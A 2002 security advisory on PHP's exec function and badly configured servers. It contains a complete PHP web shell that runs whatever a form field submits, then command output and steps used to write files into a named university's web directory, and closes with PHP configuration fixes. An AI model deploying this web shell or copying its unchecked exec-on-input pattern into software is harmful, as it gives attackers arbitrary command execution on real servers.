12th Nov 2002 [SBWID-5799]
COMMAND
PHP execution and badly configured servers
SYSTEMS AFFECTED
?
PROBLEM
Thanks to Muammer ALTUNTA$ kind mail :
There is a PhP leak in the Unix system...
The leak about the php exec function like this....
------------------Begin Exploit--------------------------------
<pre>
<body>
<form method="POST" action="mx.php">
<p>
<input type="text" name="gorev" size="20" value="<? echo $gorev; ?>"><input type="submit" value="Submit" name="B1">
<input type="reset" value="Reset" name="B2"></p>
</form>
</body>
<?
if (strlen($gorev)==0)
{die("hatali socuk dizimi....");}
#####################################################
# CoDeD By Muammer ALTUNTA$ :)
#####################################################
exec($gorev,$mumi);
if (count($mumi)==0)
{
die("Hatali parametre weya Gorew reddedildi... geri donusumu olmayan komutlar haric...");
}
for ($i=0;$i<count($mumi);$i++)
{
echo $mumi[$i];echo "<br>";
}
?>
------------------End Exploit-----------------------------
you copy this php code in your www or public_html directory and run
it... when the php is run please type the id in the edit box... like
this...
id
uid=80(www) gid=80(www) groups=80(www)
whoami
www
hoo my uid is www in the FreeBSD :)
then go to the www directoy /usr/local/www then type this command
ls -la /usr/local/www
drwxr-xr-x 8 www www 512 Apr 23 19:47 .
drwxr-xr-x 19 www www 512 Jun 9 02:02 ..
oh my god !!! the WWW directory is mine... :)
then type the command like this
mkdir /usr/local/www/data/nagat/tested
then the tested directory is created :) soon
touch /usr/local/www/data/nagat/tested/index.html
echo Yeah its Worked... >> /usr/local/www/data/nagat/tested/index.html
we control the web directory... is wery good ...
there is a examle link
http://sunburn.eng.emu.edu.tr/nagat/tested/
SOLUTION
Arkel [arkel@mad-troll.com] pointed out this is just a configuration
problem, adjust as follows :
3 options allow to resolve the problem
On php.ini or httpd.conf
open_basedir , disable_functions , safe_mode